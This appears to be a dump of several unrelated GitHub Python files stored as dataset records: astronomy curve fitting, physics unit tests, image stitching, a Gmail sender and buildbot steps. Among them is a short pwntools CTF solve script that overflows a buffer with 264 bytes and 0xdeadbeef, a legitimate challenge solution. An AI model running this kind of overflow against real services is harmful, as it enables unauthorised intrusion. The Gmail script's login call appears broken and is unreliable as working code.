greske_parametara[2])\nx0=-parametri[1]/(2*parametri[0])\napsx0=-x0\ndx=(greske_parametara[1]/parametri[1]+greske_parametara[0]/parametri[0])*apsx0/2\nh=np.arctan(0.185/parametri[2])*180/np.pi\nlam=(14-(x0+700)/60)*15-30.5/60\ndlam=(greske_parametara[1]/(2*parametri[0])+(parametri[1]*greske_parametara[0]/(2*parametri[0]**2)))/4\nfi = 90+22.2-h\nprint(lam)\nprint(dlam)\nprint('najkraca duzina senke gnomona', x0,'+/-', dx)\n#print(dfi,'dasklfjas;ldkfhas;dkfhaspdlkfahso;jdfh')\n#print(x0, 'ovo uzmi!!!')\n#print('h je', h)\n#print('Geografska sirina je: ', fi,'.')\n#print('Geografska duzina je', lam, '+/-', dlam,'.')\nt=t-x0\n#print(x0, 'ovo je x0')\n\npar1, cov1=curve_fit(fun, t, l , sigma=dl)\ng1=np.sqrt(np.diag(cov1))\n\nx1=np.arange(-65, 60, 2)\ny1=fun(x1,par1[0],par1[1],par1[2])\nplt.plot(x1, y1 , '-r', label='fit')\nplt.errorbar(t ,l ,dl , fmt='o')\nplt.legend(loc='best')\nplt.xlabel('t[min]')\nplt.ylabel('l[m]')\nplt.xlim([-65,50])\nplt.title('Grafik zavisnosti duzine senke od vremena')\nplt.show()\n\n\n\n\n\n","repo_name":"ispastlibrary/Titan","sub_path":"2015/AST1/vezbovni/Danica/gnomonDanica.py","file_name":"gnomonDanica.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"sr","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42124360349","text":"import unittest\nimport numpy as np\nimport sys\nsys.path.append('..')\nimport force_analysis # noqa\n\n\n# -------------------------------\n# force analysis tests\n# -------------------------------\nclass test_scale_box_coordinates(unittest.TestCase):\n\n def test_dims_mismatch_error(self):\n traj_xyz = np.ones((10, 8, 3))\n traj_dims = 100 + (np.random.rand(10, 3))\n ref_dims = 100 + np.random.rand(2)\n self.assertRaises(ValueError, force_analysis.scale_box_coordinates, traj_xyz, traj_dims, ref_dims)\n\n def test_all_3D_error(self):\n good_xyz, bad_xyz = np.ones((10, 5, 3)), np.ones((10, 5, 2))\n good_dims, bad_dims = np.ones((10, 3)), np.ones((10, 1))\n good_ref, bad_ref = np.ones((3)), np.ones((2))\n self.assertRaises(ValueError, force_analysis.scale_box_coordinates, good_xyz, good_dims, bad_ref)\n self.assertRaises(ValueError, force_analysis.scale_box_coordinates, good_xyz, bad_dims, good_ref)\n self.assertRaises(ValueError, force_analysis.scale_box_coordinates, bad_xyz, good_dims, good_ref)\n\n def test_scaling(self):\n traj_xyz = np.zeros((10, 5, 3)) + (15, 10, 5)\n traj_dims = np.zeros((10, 3)) + 3\n ref_dims = np.array((1, 6, 3))\n # dims are 3X, 0.5X and 1X reference. So should be 15 * 3, 10 * 0.5, 5 * 1\n scaled_coords = force_analysis.scale_box_coordinates(traj_xyz, traj_dims, ref_dims)\n self.assertTrue(all(scaled_coords[5, 0, :] == (45, 5, 5)))\n\n def test_coordinate_frame_multiplication(self):\n ref_xyz = np.ones((1, 10, 3))\n mult_xyz = force_analysis.multiply_coordinate_frame(ref_xyz, 15)\n self.assertSequenceEqual(mult_xyz.shape, (15, 10, 3))\n\n\nclass test_calc_vectors(unittest.TestCase):\n def test_coordinate_mismatch_exceptions(self):\n cp = np.ones((10, 20, 3))\n cd1 = np.ones((9, 20, 3)) # bad frame number\n cd2 = np.ones((10, 10, 3)) # bad particle number\n cd3 = np.ones((10, 20, 2)) # bad dimension number\n boxdims = np.ones((10, 3)) # correct\n self.assertRaises(ValueError, force_analysis.calc_vectors, cp, cd1, boxdims)\n self.assertRaises(ValueError, force_analysis.calc_vectors, cp, cd2, boxdims)\n self.assertRaises(ValueError, force_analysis.calc_vectors, cp, cd3, boxdims)\n\n def test_coordinate_boxdim_mismatch_exceptions(self):\n cp = np.ones((10, 20, 3))\n boxdims = np.ones((9, 3)) # not enough frames\n boxdims2 = np.ones((10, 2)) # not enough dimensions\n self.assertRaises(ValueError, force_analysis.calc_vectors, cp, cp, boxdims)\n self.assertRaises(ValueError, force_analysis.calc_vectors, cp, cp, boxdims2)\n\n def test_bad_input_dimension_exceptions(self):\n cp_too_few = np.ones((100, 3))\n cp_too_many = np.ones((100, 20, 3, 4))\n cp_good = np.ones((100, 20, 3))\n boxdims_too_few = np.ones(100)\n boxdims_too_many = np.ones((100, 3, 10))\n boxdims_good = np.ones((100, 3))\n self.assertRaises(ValueError, force_analysis.calc_vectors, cp_too_few, cp_too_few, boxdims_good)\n self.assertRaises(ValueError, force_analysis.calc_vectors, cp_too_many, cp_too_many, boxdims_good)\n self.assertRaises(ValueError, force_analysis.calc_vectors, cp_good, cp_good, boxdims_too_few)\n self.assertRaises(ValueError, force_analysis.calc_vectors, cp_good, cp_good, boxdims_too_many)\n\n def test_for_correct_vectors(self):\n boxdims = np.array([[10, 10, 10], [9.5, 9.5, 9.5]]) # 2 frames, 3D\n p_low = np.ones((2, 2, 3)) # = 1\n p_high = np.ones((2, 2, 3)) + 8.4 # = 9.4\n p_mid = np.ones((2, 2, 3)) + 4 # = 5\n vecs_pos_no_pi = force_analysis.calc_vectors(p_mid, p_high, boxdims)\n vecs_neg_no_pi = force_analysis.calc_vectors(p_mid, p_low, boxdims)\n vecs_prev_pi = force_analysis.calc_vectors(p_low, p_high, boxdims)\n vecs_next_pi = force_analysis.calc_vectors(p_high, p_low, boxdims)\n self.assertAlmostEqual(vecs_pos_no_pi[0, 0, 2], 4.4)\n self.assertAlmostEqual(vecs_neg_no_pi[1, 1, 2], -4)\n self.assertAlmostEqual(vecs_prev_pi[0, 0, 0], -1.6)\n self.assertAlmostEqual(vecs_next_pi[1, 1, 1], 1.1) # 2nd frame, 9.5 size\n\n\nclass test_calc_posres_forces(unittest.TestCase):\n\n def test_spring_constant_calculation(self):\n positive_displacements = np.zeros((10, 20, 3)) + 3.33\n negative_displacements = np.zeros((4, 18, 3)) - 3\n forces = force_analysis.calc_posres_forces(positive_displacements, 10)\n forces_neg = force_analysis.calc_posres_forces(negative_displacements, 10)\n self.assertSequenceEqual(negative_displacements.shape, (4, 18, 3))\n self.assertAlmostEqual(forces[0, 0, 0], 33.3)\n self.assertEqual(forces_neg[3, 10, 2], -30)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"scal444/dummy_particles","sub_path":"tests/test_force_analysis.py","file_name":"test_force_analysis.py","file_ext":"py","file_size_in_byte":4924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14445707477","text":"#!/usr/bin/env python\n\nimport sys\nfrom pwn import *\n\nif sys.argv[1] == \"local\":\n tube = process(sys.argv[2])\nelse:\n tube = remote(sys.argv[2], sys.argv[3])\n\ntube.recvuntil(b'see?\\n')\ntube.sendline(b'a' * 264 + (0xdeadbeef).to_bytes(8, 'little'))\ntube.recvuntil(b'troubles\\n')\nprint(tube.recvallS())\n","repo_name":"polychromatic-blackguardist/polychromatic-blackguardist.github.io","sub_path":"docs/sjqruaw/clutter-overflow/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30831796657","text":"import matplotlib.pyplot as plt\nfrom optimism.JaxConfig import *\n\nN = 150\nx = np.linspace(-0.05, 1.25, N)\n\ndef f(x):\n return -np.cos(7.14*x)*x + 0.2*x\n\ny = f(x)\ndy = vmap(grad(f))(x)\ndydy = 0.5*dy*dy\n\nplt.plot(x,15*y,'r',x,dydy,'b')\n\nplt.savefig('sin.png')\n","repo_name":"btalami/optimism","sub_path":"optimism/test/ConvexityPlot.py","file_name":"ConvexityPlot.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"37732192907","text":"import numpy as np\nimport cv2\nimport glob\nimport math\nfrom collections import defaultdict\nimport random\n\n# Config\nF_COLOR = (0, 0, 255)\nk = 0.04 # For Harris Corner\nR_DOWNSAMPLE = 4 # 4\nINPUT_DIR = \"../data/\" # \"roof/\"\nK_RANSAC = 3000 # How many iteration in RANSAC \nN_RANSAC = 8 # How many samples in RANSAC\nRANSAC_THRES = 10\nOUTPUT_NAME = \"roof_pano\"\n\ndef gkern(l=5, sig=1.):\n # Reference: https://stackoverflow.com/questions/29731726/how-to-calculate-a-gaussian-kernel-matrix-efficiently-in-numpy\n \"\"\"\n creates gaussian kernel with side length `l` and a sigma of `sig`\n \"\"\"\n ax = np.linspace(-(l - 1) / 2., (l - 1) / 2., l)\n gauss = np.exp(-0.5 * np.square(ax) / np.square(sig))\n kernel = np.outer(gauss, gauss)\n return kernel / np.sum(kernel)\n\ndef my_harris_corner(img_gray_f, k=0.04):\n '''\n Input: \n img - BGR image\n k = 0.04~0.06\n Output: \n [feature_1, feature_2, feature_3, ...]\n '''\n h ,w = img_gray_f.shape\n x_sobel = np.array([[-1, 0, 1],\n [-2, 0, 2],\n [-1, 0, 1]])\n y_sobel = np.array([[-1, -2, -1],\n [ 0, 0, 0],\n [ 1, 2, 1]])\n windows_kernal = np.array([[1, 2, 1],\n [2, 4, 2],\n [1, 2, 1]])*(1/16)\n # \n I_x = cv2.filter2D(img_gray_f, -1, x_sobel)\n I_y = cv2.filter2D(img_gray_f, -1, y_sobel)\n # \n I_x2 = I_x*I_x\n I_y2 = I_y*I_y\n I_xy = I_x*I_y\n\n # Apply windows function \n A = cv2.filter2D(I_x2, -1, windows_kernal)# A\n B = cv2.filter2D(I_y2, -1, windows_kernal)# B\n C = cv2.filter2D(I_xy, -1, windows_kernal)# C\n # \n R = -k*A*A - k*B*B - C*C + (1-2*k)*A*B\n\n ret, img_R_bin = cv2.threshold(R, R.max()*0.01, 255, cv2.THRESH_BINARY)\n n_region, labels = cv2.connectedComponents(img_R_bin.astype('int8'))\n\n f_loc = []\n for label in range(1, n_region+1):\n f_loc.append(np.argmax(R*(labels==label)))\n\n # SIFT feature description\n # Find Major Orientation\n weight_filter = gkern(l = 20, sig = 10)\n M = np.sqrt(I_x2 + I_y2)\n M = np.pad(M, 20, mode='constant', constant_values=0)\n theta = np.arctan2(I_y, I_x)\n theta = np.pad(theta, 20, mode='constant', constant_values=float('nan'))\n\n maj_ori = [] # majar oridnetation\n for f in f_loc:\n x, y = (f%w, f//w)\n x, y = x+20, y+20 # for padding\n votes = M[y-10:y+10, x-10:x+10] * weight_filter # pad zeros \n candidates = theta[y-10:y+10, x-10:x+10] # pad nan \n # \n votes = votes.ravel() # Reshape to 1D\n candidates = candidates.ravel() # Reshape to 1D\n v_box = defaultdict(int) # voting box\n for i in range(votes.shape[0]):\n if math.isnan(candidates[i]):\n continue\n c = candidates[i]//(math.pi/18)\n v_box[c] += votes[i]\n if len(v_box) == 0:# All candidates are nan\n maj_ori.append((0, 0))\n else:\n winner = max(v_box, key=v_box.get)\n maj_ori.append((winner, v_box[winner]))\n\n # Local Orientaion \n descriptor_s = []\n for f in f_loc:\n x, y = (f%w, f//w)\n x, y = x+20, y+20 # for padding\n \n descriptor = []\n for x_off in [-8, -4, 0, 4]:\n for y_off in [-8, -4, 0, 4]:\n votes = M[y-y_off:y-y_off+8, x-x_off:x-x_off+8]\n candidates = theta[y-y_off:y-y_off+8, x-x_off:x-x_off+8]\n votes = votes.ravel() # Reshape to 1D\n candidates = candidates.ravel() # Reshape to 1D\n\n v_box = [0, 0, 0, 0, 0, 0, 0, 0]\n for i in range(votes.shape[0]):\n if math.isnan(candidates[i]):\n continue\n c_idx = int((candidates[i]//(math.pi/4)) + 4)\n if c_idx == 8: c_idx = 7 # Edge case\n v_box[c_idx] += votes[i]\n descriptor += v_box\n descriptor_s.append(descriptor)\n\n return list(zip(f_loc, descriptor_s))\n\ndef find_boundary(img_pano):\n lb = None # Left bound\n rb = None # Right bound\n for i in range(img_pano.shape[1]):\n if lb == None and np.any(img_pano[:, i]):\n lb = i\n elif lb != None and rb == None and (not np.any(img_pano[:, i])):\n rb = i\n break\n ub = None # Uppder bound\n sb = None # south bound\n for i in range(img_pano.shape[0]):\n if ub == None and np.any(img_pano[i, :]):\n ub = i\n elif ub != None and sb == None and (not np.any(img_pano[i, :])):\n sb = i\n break\n return (lb, rb, ub, sb)\n\ndef to_cylinder_cor(ori_p, f_len):\n y, x = h//2 - ori_p[1], -w//2 + ori_p[0]\n xc = f_len*math.atan(x/f_len)\n yc = f_len*y/(math.sqrt(x**2 + f_len**2))\n return (int(xc + w//2), int(-yc + h//2))\n\nimg_list = [cv2.imread(i) for i in sorted(glob.glob(f\"{INPUT_DIR}*.jpg\"))]\nh ,w, c = img_list[0].shape\n\n# Preprocessing Resize\nimg_list_tmp = [cv2.resize(img, (w//R_DOWNSAMPLE, h//R_DOWNSAMPLE)) for img in img_list]\nimg_list = img_list_tmp\nh ,w, c = img_list[0].shape\n\n# This is for parrington \nf_lens = []\nwith open(f\"{INPUT_DIR}f_len.txt\", 'r') as f:\n f_lens = [float(line.split(\" \")[1]) for line in f.readlines()]\n\nprint(f\"Number of image = {len(img_list)}\")\n\nimg_cylinders = []\nfor i in range(len(img_list)):\n img_cylinder = np.zeros(shape=img_list[i].shape, dtype=np.uint8)\n for ori_y in range(h):\n for ori_x in range(w):\n y, x = h//2 - ori_y, -w//2 + ori_x\n xp = f_lens[i]*math.atan(x/f_lens[i])\n yp = f_lens[i]*y/(math.sqrt(x**2 + f_lens[i]**2))\n img_cylinder[int(-yp + h//2), int(xp + w//2)] = img_list[i][ori_y, ori_x]\n img_cylinders.append(img_cylinder)\n print(f\"{i}/{len(img_list)}\")\n\n\nmy_features_list = []\nfor i, img in enumerate(img_list):\n # Gray scale\n img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n img_gray_f = np.float32(img_gray) # Convert from uint8 to float32\n my_features = my_harris_corner(img_gray_f, k = k)\n my_features_list.append(my_features)\n print(f\"Number of harris_corner in img_{i} = {len(my_features)} \")\nprint(len(my_features_list))\n\nh ,w, c = img_list[0].shape\n# Init img_pano with first image\nimg_pano = np.zeros((2000, 10000, 3), np.uint8)\npano_ori = (0, 1000)\nimg_pano[pano_ori[1] - h//2:pano_ori[1] + h//2, \n pano_ori[0] :pano_ori[0] + w] = img_cylinders[0]\n\nfor i_curr in range(1, len(img_list)):\n i_prev = i_curr-1\n # Feature Matching\n match = [] # [(f1, f2), (f1, f2)]\n for q, q_des in my_features_list[i_prev]: # Query\n # Find match\n v_idx = None\n d_min_1st = float('inf')\n d_min_2nd = float('inf')\n for v, v_des in my_features_list[i_curr]: # value\n dis = np.linalg.norm(np.array(q_des) - np.array(v_des)) # L2 Distance\n if dis < d_min_1st:\n d_min_2nd = d_min_1st\n d_min_1st = dis\n v_idx = v\n \n # Check if it's a meaningful match\n if d_min_1st/d_min_2nd < 0.8:\n match.append((q, v_idx))\n print(f\"Number of matched features img_{i_prev}<->img_{i_curr}: {len(match)}\")\n\n # RANSAC\n min_n_out_dxy = float('inf')\n best_dxy = None # Best translation matrix\n best_match_dxy = None # Best feature set, For debugging \n for _ in range(K_RANSAC):\n random.shuffle(match)\n dx = 0\n dy = 0\n #\n match_cylider = []\n for f1, f2 in match[:N_RANSAC]:\n x1, y1 = to_cylinder_cor( (f1%w, f1//w) ,f_lens[0])\n x2, y2 = to_cylinder_cor( (f2%w, f2//w) ,f_lens[1])\n # \n dx += (x1 - x2)/N_RANSAC\n dy += (y1 - y2)/N_RANSAC\n # \n match_cylider.append((x1 + y1*w, x2 + y2*w))\n\n # Evluate the number of outliner of this model.\n \n n_outliner_dxy = 0\n for f1, f2 in match:\n x1, y1 = to_cylinder_cor( (f1%w, f1//w) ,f_lens[0]) # TODO transform feature points to cylinder and find dx,dy\n x2, y2 = to_cylinder_cor( (f2%w, f2//w) ,f_lens[1])\n # dxy\n err_squ = ((x2+dx) - x1)**2 + ((y2+dy) - y1)**2\n if err_squ > RANSAC_THRES:\n n_outliner_dxy += 1\n\n if min_n_out_dxy > n_outliner_dxy:\n min_n_out_dxy = n_outliner_dxy\n best_dxy = (int(dx), int(dy))\n best_match_dxy = match_cylider\n\n print(f\"Reject rate for best match: {round(min_n_out_dxy/len(match)*100, 1)}% ({min_n_out_dxy}/{len(match)})\")\n print(f\"best_dxy = {best_dxy}\")\n\n pano_ori = (pano_ori[0] + best_dxy[0], pano_ori[1] + best_dxy[1])\n blend_srt = pano_ori[0]\n blend_len = w - best_dxy[0] # blend_end - blend_srt\n blend_end = blend_srt + blend_len # w\n for i in range(blend_srt, blend_end):\n for j in range(h):\n img1_percent = (blend_end - i) / blend_len\n img1_v = img_pano[pano_ori[1] - h//2 + j, i]\n img2_v = img_cylinders[i_curr][j, i-blend_srt]\n \n # Deal with black area\n if not np.any(img1_v): # all zero \n img1_percent = 0.0\n elif not np.any(img2_v): # all zero \n img1_percent = 1.0\n #\n img_pano[pano_ori[1] - h//2 + j, i] = img1_v * img1_percent + img2_v * (1-img1_percent)\n\n # Directly paste non-overlapping part\n img_pano[pano_ori[1] - h//2 :pano_ori[1] + h//2, \n pano_ori[0] + blend_len:pano_ori[0] + w] = img_cylinders[i_curr][:, blend_len:]\n\nlb, rb, ub, sb = find_boundary(img_pano)\nimg_pano = img_pano[ub:sb, lb:rb]\n\ncv2.imwrite(f\"{OUTPUT_NAME}.jpg\", img_pano)\n\nstart_black = None\nfor i in range(img_pano.shape[0]):\n if np.any(img_pano[i, 0]):\n start_black = i\n break\nend_black = None\nfor i in range(img_pano.shape[0]):\n if np.any(img_pano[i, -1]):\n end_black = i\n break\n\nglobal_offset = end_black - start_black # Assuming drifting down \nstride_offset = global_offset / img_pano.shape[1]\nprint(f\"stride_offset = {stride_offset}\")\n\nimg_pano_driftless = np.zeros(img_pano.shape, np.uint8)\n\nif stride_offset >= 0:\n for i in range(img_pano.shape[1]):\n img_pano_driftless[:img_pano.shape[0] - int(i*stride_offset), i] = img_pano[int(i*stride_offset):, i]\nelse:\n stride_offset = abs(stride_offset)\n for i in range(img_pano.shape[1]-1, -1, -1):\n p = int( (img_pano.shape[1]-1-i)*stride_offset )\n img_pano_driftless[:img_pano.shape[0] - p, i] = img_pano[p:, i]\n\nlb, rb, ub, sb = find_boundary(img_pano_driftless)\nimg_pano_driftless = img_pano_driftless[ub:sb, lb:rb]\ncv2.imwrite(f\"{OUTPUT_NAME}_driftless.jpg\", img_pano_driftless)\n","repo_name":"KenYu910645/VFX2022","sub_path":"hw2_image_stiching/hw2_image_stiching.py","file_name":"hw2_image_stiching.py","file_ext":"py","file_size_in_byte":10728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18405417065","text":"import smtplib\nimport os\nimport json\nfrom email.message import EmailMessage\nfrom google.oauth2.credentials import Credentials\nfrom google.auth.transport.requests import Request\nfrom google_auth_oauthlib.flow import InstalledAppFlow\n\n\n# set up OAuth 2.0 credentials\ncreds = None\nif os.path.exists('token.json'):\n creds = Credentials.from_authorized_user_file('token.json', ['https://www.googleapis.com/auth/gmail.send'])\nif not creds or not creds.valid:\n with open('credentials.json', 'r') as f:\n client_config = json.load(f)['installed']\n flow = InstalledAppFlow.from_client_config(client_config, ['https://www.googleapis.com/auth/gmail.send'])\n creds = flow.run_local_server(port=0)\n with open('token.json', 'w') as token:\n token.write(creds.to_json())\n\n# create the message object\nmsg = EmailMessage()\nmsg['From'] = 'rahulmehta.rm933@gmail.com'\nmsg['To'] = 'rmehta.r7@gmail.com'\nmsg['Subject'] = 'Test email'\nmsg.set_content('This is a test email.')\n\n# send the email using SMTP\nwith smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp:\n smtp.login(creds.token, None)\n smtp.send_message(msg)\n","repo_name":"rahmeh7/Email_Using_SMTP_Python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73181865444","text":"import json\nimport pytest\n\nfrom azure.identity import DefaultAzureCredential\nfrom azure.ml import MLClient\n\n\n@pytest.fixture(scope='session')\ndef component_config():\n config_file = 'component_config.json'\n\n with open(config_file, 'r') as cf:\n result = json.load(cf)\n\n return result\n\n@pytest.fixture(scope='session')\ndef workspace_config():\n ws_config_file = 'config.json'\n\n with open(ws_config_file) as cf:\n result = json.load(cf)\n\n return result\n\n@pytest.fixture(scope='function')\ndef ml_client(workspace_config):\n client = MLClient(\n credential=DefaultAzureCredential(),\n subscription_id=workspace_config['subscription_id'],\n resource_group_name=workspace_config['resource_group'],\n workspace_name=workspace_config['workspace_name'],\n logging_enable=True\n )\n\n return client","repo_name":"Azure/AutoML-vNext-Preview","sub_path":"test/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"52"} +{"seq_id":"24275231011","text":"# import requests\r\n# import requests\r\n# import bs4\r\n#\r\n# # create lookup dictionary of canadian cities and their codes only only\r\n# # lut = open('stations.txt', 'r').readlines()[3793:4673]\r\n# url = 'https://www.aviationweather.gov/adds/metars?station_ids=CYSM&std_trans=translated&chk_metars=on'\r\n#\r\n# metarHTML = requests.get(url)\r\n# metar = bs4.BeautifulSoup(metarHTML.text, 'lxml').select('strong')[1].getText().split()\r\n#\r\n# print(metar)\r\n\r\nnumDict = {}\r\n\r\nnumDict[6] = ['six']\r\n\r\nnumDict[6].append('seven')\r\n\r\nprint(numDict)\r\n","repo_name":"MaksimStadler/METAR-Training-Application","sub_path":"METAR Decoder/2019-04-22 Update/TEST.py","file_name":"TEST.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"138748707","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nfrom functools import wraps\nfrom scrapper import Scrapper\nimport fb\nimport pickle\nimport sys\n\n\ndef retry(func):\n @wraps(func)\n def decorated(*args):\n result = func(*args)\n while not result:\n print(\"Retrying..\")\n result = func(*args, retry=True)\n return result\n return decorated\n\n\nif __name__ == \"__main__\":\n scrapper = Scrapper()\n nodes = set()\n nodes_sets = [pickle.load(open(filename)) for filename in sys.argv[1:]]\n nodes_info_filename = \"all_nodes_info.pickle\"\n\n try:\n nodes_info = pickle.load(open(nodes_info_filename))\n processed = set(nodes_info.keys())\n except IOError:\n nodes_info = {}\n processed = set()\n\n for nodes_set in nodes_sets:\n for number, node in enumerate(nodes_set - processed):\n nodes_info[node] = scrapper.get_node_info(node)\n processed.add(node)\n try:\n print(\"%d / %d / %d %s\" % (len(processed), len(nodes_set), \n len(nodes_sets), nodes_info[node][\"name\"]))\n except:\n pass\n\n if not(number % 1000):\n nodes_info_file = open(nodes_info_filename, \"w\")\n pickle.dump(nodes_info, nodes_info_file)\n nodes_info_file.close()\n print(\"-------------------------------------------------- Flushed\")\n\n nodes_info_file = open(nodes_info_filename, \"w\")\n pickle.dump(nodes_info, nodes_info_file)\n nodes_info_file.close()\n print(\"-------------------------------------------------- Flushed\")\n","repo_name":"pointtonull/browser","sub_path":"examples/scrapper_info.py","file_name":"scrapper_info.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"13056524226","text":"import stat\n\nfrom buildbot.interfaces import BuildSlaveTooOldError\nfrom buildbot.process import buildstep\nfrom buildbot.status.results import FAILURE\nfrom buildbot.status.results import SUCCESS\n\n\nclass SlaveBuildStep(buildstep.BuildStep):\n\n def describe(self, done=False):\n return self.descriptionDone if done else self.description\n\n\nclass SetPropertiesFromEnv(SlaveBuildStep):\n\n \"\"\"\n Sets properties from envirionment variables on the slave.\n\n Note this is transfered when the slave first connects\n \"\"\"\n name = 'SetPropertiesFromEnv'\n description = ['Setting']\n descriptionDone = ['Set']\n\n def __init__(self, variables, source=\"SlaveEnvironment\", **kwargs):\n buildstep.BuildStep.__init__(self, **kwargs)\n self.variables = variables\n self.source = source\n\n def start(self):\n # on Windows, environment variables are case-insensitive, but we have\n # a case-sensitive dictionary in slave_environ. Fortunately, that\n # dictionary is also folded to uppercase, so we can simply fold the\n # variable names to uppercase to duplicate the case-insensitivity.\n fold_to_uppercase = (self.buildslave.slave_system == 'win32')\n\n properties = self.build.getProperties()\n environ = self.buildslave.slave_environ\n variables = self.variables\n log = []\n if isinstance(variables, str):\n variables = [self.variables]\n for variable in variables:\n key = variable\n if fold_to_uppercase:\n key = variable.upper()\n value = environ.get(key, None)\n if value:\n # note that the property is not uppercased\n properties.setProperty(variable, value, self.source,\n runtime=True)\n log.append(\"%s = %r\" % (variable, value))\n self.addCompleteLog(\"properties\", \"\\n\".join(log))\n self.step_status.setText(self.describe(done=True))\n self.finished(SUCCESS)\n\n\nclass FileExists(SlaveBuildStep):\n\n \"\"\"\n Check for the existence of a file on the slave.\n \"\"\"\n name = 'FileExists'\n description = 'Checking'\n descriptionDone = 'Checked'\n\n renderables = ['file']\n\n haltOnFailure = True\n flunkOnFailure = True\n\n def __init__(self, file, **kwargs):\n buildstep.BuildStep.__init__(self, **kwargs)\n self.file = file\n\n def start(self):\n slavever = self.slaveVersion('stat')\n if not slavever:\n raise BuildSlaveTooOldError(\"slave is too old, does not know \"\n \"about stat\")\n cmd = buildstep.RemoteCommand('stat', {'file': self.file})\n d = self.runCommand(cmd)\n d.addCallback(lambda res: self.commandComplete(cmd))\n d.addErrback(self.failed)\n\n def commandComplete(self, cmd):\n if cmd.didFail():\n self.step_status.setText([\"File not found.\"])\n self.finished(FAILURE)\n return\n s = cmd.updates[\"stat\"][-1]\n if stat.S_ISREG(s[stat.ST_MODE]):\n self.step_status.setText([\"File found.\"])\n self.finished(SUCCESS)\n else:\n self.step_status.setText([\"Not a file.\"])\n self.finished(FAILURE)\n\n\nclass CopyDirectory(SlaveBuildStep):\n\n \"\"\"\n Copy a directory tree on the slave.\n \"\"\"\n name = 'CopyDirectory'\n description = ['Copying']\n descriptionDone = ['Copied']\n\n renderables = ['src', 'dest']\n\n haltOnFailure = True\n flunkOnFailure = True\n\n def __init__(self, src, dest, timeout=None, maxTime=None, **kwargs):\n buildstep.BuildStep.__init__(self, **kwargs)\n self.src = src\n self.dest = dest\n self.timeout = timeout\n self.maxTime = maxTime\n\n def start(self):\n slavever = self.slaveVersion('cpdir')\n if not slavever:\n raise BuildSlaveTooOldError(\"slave is too old, does not know \"\n \"about cpdir\")\n\n args = {'fromdir': self.src, 'todir': self.dest}\n if self.timeout:\n args['timeout'] = self.timeout\n if self.maxTime:\n args['maxTime'] = self.maxTime\n\n cmd = buildstep.RemoteCommand('cpdir', args)\n d = self.runCommand(cmd)\n d.addCallback(lambda res: self.commandComplete(cmd))\n d.addErrback(self.failed)\n\n def commandComplete(self, cmd):\n if cmd.didFail():\n self.step_status.setText([\"Copying\", self.src, \"to\", self.dest, \"failed.\"])\n self.finished(FAILURE)\n return\n self.step_status.setText(self.describe(done=True))\n self.finished(SUCCESS)\n\n def describe(self, done=False):\n desc = self.descriptionDone if done else self.description\n desc = desc[:]\n desc.extend([self.src, \"to\", self.dest])\n return desc\n\n\nclass RemoveDirectory(SlaveBuildStep):\n\n \"\"\"\n Remove a directory tree on the slave.\n \"\"\"\n name = 'RemoveDirectory'\n description = ['Deleting']\n descriptionDone = ['Deleted']\n\n renderables = ['dir']\n\n haltOnFailure = True\n flunkOnFailure = True\n\n def __init__(self, dir, **kwargs):\n buildstep.BuildStep.__init__(self, **kwargs)\n self.dir = dir\n\n def start(self):\n slavever = self.slaveVersion('rmdir')\n if not slavever:\n raise BuildSlaveTooOldError(\"slave is too old, does not know \"\n \"about rmdir\")\n cmd = buildstep.RemoteCommand('rmdir', {'dir': self.dir})\n d = self.runCommand(cmd)\n d.addCallback(lambda res: self.commandComplete(cmd))\n d.addErrback(self.failed)\n\n def commandComplete(self, cmd):\n if cmd.didFail():\n self.step_status.setText([\"Delete failed.\"])\n self.finished(FAILURE)\n return\n self.step_status.setText(self.describe(done=True))\n self.finished(SUCCESS)\n\n\nclass MakeDirectory(SlaveBuildStep):\n\n \"\"\"\n Create a directory on the slave.\n \"\"\"\n name = 'MakeDirectory'\n description = ['Creating']\n descriptionDone = ['Created']\n\n renderables = ['dir']\n\n haltOnFailure = True\n flunkOnFailure = True\n\n def __init__(self, dir, **kwargs):\n buildstep.BuildStep.__init__(self, **kwargs)\n self.dir = dir\n\n def start(self):\n slavever = self.slaveVersion('mkdir')\n if not slavever:\n raise BuildSlaveTooOldError(\"slave is too old, does not know \"\n \"about mkdir\")\n cmd = buildstep.RemoteCommand('mkdir', {'dir': self.dir})\n d = self.runCommand(cmd)\n d.addCallback(lambda res: self.commandComplete(cmd))\n d.addErrback(self.failed)\n\n def commandComplete(self, cmd):\n if cmd.didFail():\n self.step_status.setText([\"Create failed.\"])\n self.finished(FAILURE)\n return\n self.step_status.setText(self.describe(done=True))\n self.finished(SUCCESS)\n\n\nclass CompositeStepMixin():\n\n def addLogForRemoteCommands(self, logname):\n \"\"\"This method must be called by user classes\n composite steps could create several logs, this mixin functions will write\n to the last one.\n \"\"\"\n self.rc_log = self.addLog(logname)\n return self.rc_log\n\n def runRemoteCommand(self, cmd, args, abandonOnFailure=True,\n evaluateCommand=lambda cmd: cmd.didFail()):\n \"\"\"generic RemoteCommand boilerplate\"\"\"\n cmd = buildstep.RemoteCommand(cmd, args)\n cmd.useLog(self.rc_log, False)\n d = self.runCommand(cmd)\n\n def commandComplete(cmd):\n if abandonOnFailure and cmd.didFail():\n raise buildstep.BuildStepFailed()\n return evaluateCommand(cmd)\n\n 